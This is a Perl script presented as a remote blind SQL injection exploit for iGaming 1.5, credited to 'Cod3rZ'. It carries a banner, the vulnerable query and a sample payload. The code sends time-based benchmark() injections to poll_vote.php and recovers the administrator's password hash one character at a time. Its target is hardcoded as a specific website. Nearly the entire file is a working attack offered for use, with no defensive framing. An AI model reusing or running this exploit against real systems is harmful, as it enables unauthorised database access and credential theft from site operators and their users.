#!/usr/bin/perl #===========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #===========================================================================================================================# # iGaming 1.5 Remote Blind Sql Injection Exploit # #===========================================================================================================================# # Author : Cod3rZ # #===========================================================================================================================# # Site : http://cod3rz.helloweb.eu # # Site : http://devilsnight.altervista.org # #===========================================================================================================================# # $result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'"); # #===========================================================================================================================# # ?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,1,1))=48),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/* # #===========================================================================================================================# # Thanks to: the man of the greetz, DreamMark # #===========================================================================================================================# # Exploit based: Rossi46GO # # Modded by: Cod3rZ # #===========================================================================================================================# # Usage: perl ig.pl site # #===========================================================================================================================# use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; $ua = LWP::UserAgent->new; $site = "http://front-gamerz.com"; if(!$site) { &usage; } @array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); sub usage { print " Usage: perl ig.pl site \n"; print " Ex.: perl ig.pl http://127.0.0.1 \n"; } sub request { $var = $_[0]; $start = Time::HiRes::time(); $response = $ua->request(GET $var,s => $var); $response->is_success() || print("$!\n"); $end = Time::HiRes::time(); $time = $end - $start; return $time } sub refresh{ system("cls"); print " -------------------------------------------------\n"; print " iGaming 1.5 Remote Blind Sql Injection Exploit \n"; print " Powered by Cod3rZ \n"; print " http://cod3rz.helloweb.eu \n"; print " -------------------------------------------------\n"; print " Please Wait.. \n"; print " Hash : " . $_[3] . " \n"; print " -------------------------------------------------\n"; } for ($i = 1; $i < 33; $i++) { for ($j = 0; $j < 16; $j++) { $var = $site."/poll_vote.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/*"; $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); if($time > 8) { $time = request($var); refresh($host,$timedefault,$j,$hash,$time,$i); $hash .= chr($array[$j]); refresh($host,$timedefault,$j,$hash,$time,$i); $j=200; } } if($i == 1 && !$hash) { print " Failed \n"; print " -------------------------------------------------\n"; die(); } if($i == 32) { print " Exploit Terminated \n"; print " -------------------------------------------------\n "; system('pause'); }}